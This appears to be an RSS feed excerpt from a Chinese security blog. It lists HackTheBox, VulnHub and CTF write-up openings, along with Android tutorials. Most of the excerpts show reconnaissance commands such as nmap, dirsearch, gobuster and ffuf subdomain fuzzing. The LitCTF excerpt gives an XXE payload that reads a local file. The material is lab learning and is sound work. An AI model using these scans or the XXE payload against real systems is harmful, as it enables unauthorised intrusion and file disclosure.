&lt;h2 id=&#34;basic-scan&#34;&gt;Basic Scan&lt;/h2&gt;
&lt;h3 id=&#34;nmap&#34;&gt;Nmap&lt;/h3&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;nmap -A -O sightless.htb
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-sightless/images/image-94.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-sightless/images/image-94.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;开放端口：&lt;code&gt;21&lt;/code&gt;、&lt;code&gt;22&lt;/code&gt;、&lt;code&gt;80&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Web服务器：&lt;code&gt;nginx 1.18.0&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;FTP服务器：&lt;code&gt;ProFTPD&lt;/code&gt;&lt;/p&gt;
&lt;h3 id=&#34;dirsearch&#34;&gt;Dirsearch&lt;/h3&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;dirsearch -u sightless.htb -t 50
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-sightless/images/image-95.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-sightless/images/image-95.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;h3 id=&#34;gobuster&#34;&gt;Gobuster&lt;/h3&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;gobuster dir -u http://sightless.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-sightless/images/image-96.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-sightless/images/image-96.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Mailing</title>
      <link>https://www.hyhforever.top/posts/2024/09/hackthebox-mailing/</link>
      <pubDate>Thu, 05 Sep 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/09/hackthebox-mailing/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Windows&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;basic-scan&#34;&gt;Basic Scan&lt;/h2&gt;
&lt;h3 id=&#34;nmap&#34;&gt;Nmap&lt;/h3&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;nmap -A -O -Pn mailing.htb
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-mailing/images/image-66.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-mailing/images/image-66.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;开放端口：&lt;code&gt;25&lt;/code&gt;、&lt;code&gt;80&lt;/code&gt;、&lt;code&gt;110&lt;/code&gt;、&lt;code&gt;135&lt;/code&gt;、&lt;code&gt;139&lt;/code&gt;、&lt;code&gt;143&lt;/code&gt;、&lt;code&gt;445&lt;/code&gt;、&lt;code&gt;465&lt;/code&gt;、&lt;code&gt;587&lt;/code&gt;、&lt;code&gt;993&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Server：&lt;code&gt;hMailServer&lt;/code&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-BoardLight</title>
      <link>https://www.hyhforever.top/posts/2024/09/hackthebox-boardlight/</link>
      <pubDate>Wed, 04 Sep 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/09/hackthebox-boardlight/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;basic-scan&#34;&gt;Basic Scan&lt;/h2&gt;
&lt;h3 id=&#34;nmap&#34;&gt;Nmap&lt;/h3&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;nmap -A -O boardlight.htb
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-boardlight/images/image-43.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-boardlight/images/image-43.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;开放端口：&lt;code&gt;22、80&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Server：&lt;code&gt;Apache 2.4.41 (Ubuntu)&lt;/code&gt;&lt;/p&gt;
&lt;h3 id=&#34;dirsearch&#34;&gt;Dirsearch&lt;/h3&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;dirsearch  -u boardlight.htb -t 50
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-boardlight/images/image-44.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-boardlight/images/image-44.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;h3 id=&#34;subdomain-fuzzing&#34;&gt;Subdomain Fuzzing&lt;/h3&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-boardlight/images/image-45.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-boardlight/images/image-45.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;在页尾发现一个：&lt;code&gt;Board.htb&lt;/code&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Editorial</title>
      <link>https://www.hyhforever.top/posts/2024/09/hackthebox-editorial/</link>
      <pubDate>Tue, 03 Sep 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/09/hackthebox-editorial/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;basic-scan&#34;&gt;Basic Scan&lt;/h2&gt;
&lt;h3 id=&#34;nmap&#34;&gt;Nmap&lt;/h3&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;nmap -A -O editorial.htb
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-editorial/images/image-23.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-editorial/images/image-23.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;开放端口：&lt;code&gt;**22**、**80**&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Server：&lt;code&gt;**nginx 1.18.0** （Ubuntu）&lt;/code&gt;&lt;/p&gt;
&lt;h3 id=&#34;dirsearch&#34;&gt;Dirsearch&lt;/h3&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;dirsearch -u editorial.htb -t 50
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-editorial/images/image-24.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-editorial/images/image-24.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-PermX</title>
      <link>https://www.hyhforever.top/posts/2024/09/hackthebox-permx/</link>
      <pubDate>Tue, 03 Sep 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/09/hackthebox-permx/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;basic-scan&#34;&gt;Basic Scan&lt;/h2&gt;
&lt;h3 id=&#34;nmap&#34;&gt;Nmap&lt;/h3&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;namp 10.10.11.23 -A -O
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-permx/images/image.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-permx/images/image.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Opened Ports：22、80&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Server：Apache 2.4.52 (Ubuntu)&lt;/strong&gt;&lt;/p&gt;
&lt;h3 id=&#34;subdomain-fuzzing&#34;&gt;Subdomain Fuzzing&lt;/h3&gt;
&lt;p&gt;Github：&lt;a href=&#34;https://github.com/TheKingOfDuck/fuzzDicts&#34;&gt;TheKingOfDuck/fuzzDicts: Web Pentesting (github.com)&lt;/a&gt;&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;ffuf -w main.txt -u http://permx.htb/ -H &amp;#34;Host:FUZZ.permx.htb&amp;#34; -mc 200
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-permx/images/image-3.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/09/hackthebox-permx/images/image-3.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Compiled</title>
      <link>https://www.hyhforever.top/posts/2024/08/hackthebox-compiled/</link>
      <pubDate>Sat, 31 Aug 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/08/hackthebox-compiled/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Windows&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Rated Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;port-scan&#34;&gt;Port Scan&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;#linux
nmap -A -Pn 10.10.11.26
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/08/hackthebox-compiled/images/image-119.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/08/hackthebox-compiled/images/image-119.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/08/hackthebox-compiled/images/image-120.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/08/hackthebox-compiled/images/image-120.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;扫描出来3000和5000端口。&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/08/hackthebox-compiled/images/image-121.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/08/hackthebox-compiled/images/image-121.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;3000端口是一个类似于git的服务，具体是由Gitea驱动的。包含了注册、登录、创建仓库以及拉取代码等等功能。&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Sea</title>
      <link>https://www.hyhforever.top/posts/2024/08/hackthebox-sea/</link>
      <pubDate>Wed, 28 Aug 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/08/hackthebox-sea/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;basic-scan&#34;&gt;Basic Scan&lt;/h2&gt;
&lt;h3 id=&#34;port--dir-scan&#34;&gt;Port &amp;amp; Dir scan&lt;/h3&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/08/hackthebox-sea/images/image-78.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/08/hackthebox-sea/images/image-78.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/08/hackthebox-sea/images/image-79.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/08/hackthebox-sea/images/image-79.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;发现一个contact.php。进去看看&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/08/hackthebox-sea/images/image-80.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/08/hackthebox-sea/images/image-80.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;尝试抓包看看。并没有什么回显。&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/08/hackthebox-sea/images/image-81.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/08/hackthebox-sea/images/image-81.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;尝试扫描一下其他的目录。&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/08/hackthebox-sea/images/image-82.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/08/hackthebox-sea/images/image-82.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>Matrix-Breakout-2-Morpheus</title>
      <link>https://www.hyhforever.top/posts/2024/08/matrix-breakout-2-morpheus/</link>
      <pubDate>Mon, 26 Aug 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/08/matrix-breakout-2-morpheus/</guid>
      <description>&lt;h2 id=&#34;前言&#34;&gt;&lt;em&gt;前言&lt;/em&gt;&lt;/h2&gt;
&lt;p&gt;靶机来自&lt;a href=&#34;https://www.vulnhub.com/&#34;&gt;Vulnerable By Design ~ VulnHub&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;下载链接：https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova&lt;/p&gt;</description>
    </item>
    <item>
      <title>The Planets: Earth</title>
      <link>https://www.hyhforever.top/posts/2024/08/the-planets-earth/</link>
      <pubDate>Mon, 26 Aug 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/08/the-planets-earth/</guid>
      <description>&lt;h2 id=&#34;前言&#34;&gt;&lt;em&gt;前言&lt;/em&gt;&lt;/h2&gt;
&lt;p&gt;靶机来源：&lt;a href=&#34;https://www.vulnhub.com/entry/the-planets-earth,755/&#34;&gt;Vulnerable By Design ~ VulnHub&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;注意！！！！！！&lt;/p&gt;
&lt;p&gt;本文内容纯属非预期，请不要在意本文内容。&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id=&#34;正文&#34;&gt;正文&lt;/h2&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/08/the-planets-earth/images/image-56.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/08/the-planets-earth/images/image-56.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;发现有http端口可以访问。直接访问是400报错。&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/08/the-planets-earth/images/image-57.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/08/the-planets-earth/images/image-57.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;进行更详细的扫描。可以发现编程语言用的是Python版本为3.9，Web服务器是Apache 2.4.51&lt;/p&gt;</description>
    </item>
    <item>
      <title>MoeCTF 2024</title>
      <link>https://www.hyhforever.top/posts/2024/08/moectf-2024/</link>
      <pubDate>Tue, 13 Aug 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/08/moectf-2024/</guid>
      <description>&lt;p&gt;一年一度的MoeCTF又来了，不过我好久没打过CTF了，前段时间一直在搞开发。&lt;/p&gt;
&lt;h2 id=&#34;web&#34;&gt;WEB&lt;/h2&gt;
&lt;h3 id=&#34;弗拉格之地的入口&#34;&gt;&lt;strong&gt;弗拉格之地的入口&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;直接进入 &lt;strong&gt;/robots.tx&lt;/strong&gt;t 发现 /webtutorEntry.php文件，进入即可拿到flag&lt;/p&gt;</description>
    </item>
    <item>
      <title>Android-Compose中的基本布局</title>
      <link>https://www.hyhforever.top/posts/2024/07/basic-layouts-in-android-compose/</link>
      <pubDate>Fri, 12 Jul 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/07/basic-layouts-in-android-compose/</guid>
      <description>&lt;h2 id=&#34;目标&#34;&gt;目标&lt;/h2&gt;
&lt;p&gt;构建一个健康应用，这款应用包含两个版块，一个列出了&lt;strong&gt;收藏合集&lt;/strong&gt;，另一个列出了&lt;strong&gt;各种体育锻炼&lt;/strong&gt;。具体如下图所示，包括竖屏和横屏的适配&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/07/basic-layouts-in-android-compose/images/image-28.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/07/basic-layouts-in-android-compose/images/image-28.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/07/basic-layouts-in-android-compose/images/image-29.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/07/basic-layouts-in-android-compose/images/image-29.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&#34;主要内容&#34;&gt;主要内容&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;借助修饰符扩充可组合项&lt;/p&gt;</description>
    </item>
    <item>
      <title>Android-状态交互-TipCalculate</title>
      <link>https://www.hyhforever.top/posts/2024/07/android-state-interaction-tip-calculate/</link>
      <pubDate>Wed, 10 Jul 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/07/android-state-interaction-tip-calculate/</guid>
      <description>&lt;h2 id=&#34;前言&#34;&gt;前言&lt;/h2&gt;
&lt;p&gt;在上一篇摇骰子的文章里，在局部使用了&lt;strong&gt;remember multableStateof&lt;/strong&gt;用于将变量存于内存之中，以便于状态变换。这篇文章的主要内容是设计一个简单的小费计算器，并且可以自定义选项。&lt;/p&gt;</description>
    </item>
    <item>
      <title>Android-Compose初步-摇骰子</title>
      <link>https://www.hyhforever.top/posts/2024/07/dice-shaker-development-in-android-compose/</link>
      <pubDate>Tue, 09 Jul 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/07/dice-shaker-development-in-android-compose/</guid>
      <description>&lt;h2 id=&#34;前言&#34;&gt;前言&lt;/h2&gt;
&lt;p&gt;最近在学习&lt;strong&gt;Android app&lt;/strong&gt;开发，用的是Kotlin语言，然而B站上面的视频质量并不是很高，大多数都是对编程无基础人员的基本语法教学。相比之下，我觉得Android官方的&lt;strong&gt;Developer&lt;/strong&gt;开发者课程是很不错的。此文章就是根据Android Developer中的&lt;strong&gt;创建交互式Dice Roller&lt;/strong&gt;（摇骰子）部分进行学习记录，使用的是&lt;strong&gt;Jetpack compose&lt;/strong&gt;的ui开发框架。&lt;/p&gt;</description>
    </item>
    <item>
      <title>Windows-evtx分析</title>
      <link>https://www.hyhforever.top/posts/2024/07/windows-evtx-analysis/</link>
      <pubDate>Mon, 08 Jul 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/07/windows-evtx-analysis/</guid>
      <description>&lt;h2 id=&#34;关于evtx&#34;&gt;关于evtx&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;evtx&lt;/code&gt;文件是微软采用的一种全新的日志文件格式。在此之前的格式是 &lt;code&gt;evt&lt;/code&gt; 。&lt;code&gt;evtx&lt;/code&gt;由&lt;code&gt;Windows&lt;/code&gt;事件查看器创建，包含Windows记录的事件列表，以专有的二进制XML格式保存。&lt;/p&gt;</description>
    </item>
    <item>
      <title>等保-Linux等保测评</title>
      <link>https://www.hyhforever.top/posts/2024/07/linux-graded-protection-assessment/</link>
      <pubDate>Sat, 06 Jul 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/07/linux-graded-protection-assessment/</guid>
      <description>&lt;h2 id=&#34;前言&#34;&gt;前言&lt;/h2&gt;
&lt;p&gt;环境来自于玄机edisec&lt;/p&gt;
&lt;h2 id=&#34;题解&#34;&gt;题解&lt;/h2&gt;
&lt;h3 id=&#34;步骤一&#34;&gt;步骤一&lt;/h3&gt;
&lt;p&gt;1.查看相应文件，账户xiaoming的密码设定多久过期&lt;/p&gt;
&lt;p&gt;linux chage命令简介：chage命令用于密码实效管理，该是用来修改帐号和密码的有效期限。&lt;/p&gt;</description>
    </item>
    <item>
      <title>朵米客服平台</title>
      <link>https://www.hyhforever.top/posts/2024/06/vulnerability-reproduction-dome-customer-service-platform/</link>
      <pubDate>Sat, 15 Jun 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/06/vulnerability-reproduction-dome-customer-service-platform/</guid>
      <description>&lt;p&gt;环境：&lt;a href=&#34;https://hackhub.get-shell.com/&#34;&gt;极核::CTF (get-shell.com)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;进入平台主页，点击免费使用，注册账号，登入后台&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/06/vulnerability-reproduction-dome-customer-service-platform/images/image-11.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/06/vulnerability-reproduction-dome-customer-service-platform/images/image-11.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;在左侧的广告设置一栏中，存在图片上传的点&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/06/vulnerability-reproduction-dome-customer-service-platform/images/image-12.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/06/vulnerability-reproduction-dome-customer-service-platform/images/image-12.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;这里可以先随意上传一个图片（要先打开burp suite的拦截，在点击上传&lt;/p&gt;</description>
    </item>
    <item>
      <title>背景星空特效</title>
      <link>https://www.hyhforever.top/posts/2024/06/background-starry-sky-visual-effects/</link>
      <pubDate>Sun, 02 Jun 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/06/background-starry-sky-visual-effects/</guid>
      <description>&lt;p&gt;本站使用的星空背景特效是用html5 canvas绘制而成&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/06/background-starry-sky-visual-effects/images/image-8.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/06/background-starry-sky-visual-effects/images/image-8.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;在Argon主题设置背景图片的代码里可以看到，背景图层的z-index是-2&lt;/p&gt;
&lt;p&gt;这里只需要添加一个canvas画布，把z-index抬高一点，即可覆盖&lt;/p&gt;</description>
    </item>
    <item>
      <title>LitCTF 2024</title>
      <link>https://www.hyhforever.top/posts/2024/06/litctf-2024/</link>
      <pubDate>Sat, 01 Jun 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/06/litctf-2024/</guid>
      <description>&lt;h2 id=&#34;web&#34;&gt;WEB&lt;/h2&gt;
&lt;h3 id=&#34;exx&#34;&gt;exx&lt;/h3&gt;
&lt;p&gt;这个标题以及整个界面，在NSS里面是做到过原题的，整体思路就是XXE&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/06/litctf-2024/images/image.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/06/litctf-2024/images/image.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;&amp;lt;?xml version=&amp;#34;1.0&amp;#34; ?&amp;gt;
&amp;lt;!DOCTYPE note [
&amp;lt;!ENTITY hyh SYSTEM &amp;#34;file:///flag&amp;#34;&amp;gt;
]&amp;gt;
&amp;lt;user&amp;gt;
&amp;lt;username&amp;gt;&amp;amp;hyh;&amp;lt;/username&amp;gt;
&amp;lt;password&amp;gt;123456&amp;lt;/password&amp;gt;
&amp;lt;/user&amp;gt;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;然后发包即可&lt;/p&gt;
